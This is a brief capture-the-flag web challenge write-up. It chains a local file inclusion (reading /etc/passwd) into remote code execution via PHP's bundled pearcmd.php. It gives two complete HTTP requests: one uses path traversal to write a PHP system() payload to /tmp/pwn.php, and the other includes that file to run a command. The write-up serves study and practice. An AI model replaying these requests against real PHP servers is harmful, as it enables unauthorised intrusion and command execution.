Author: zeyu2001
Category: Web
LFI to view /etc/passwd
Achieve RCE through the pre-installed pearcmd.php
- Write a PHP payload to
/tmp/pwn.php:
GET /?page=../../../../usr/local/lib/php/pearcmd.php&+config-create+/tmp/<?=system('/readflag')?>/*+/tmp/pwn.php HTTP/1.1
- LFI to include
/tmp/pwn.php:
GET /?page=../../../../tmp/pwn.php HTTP/1.1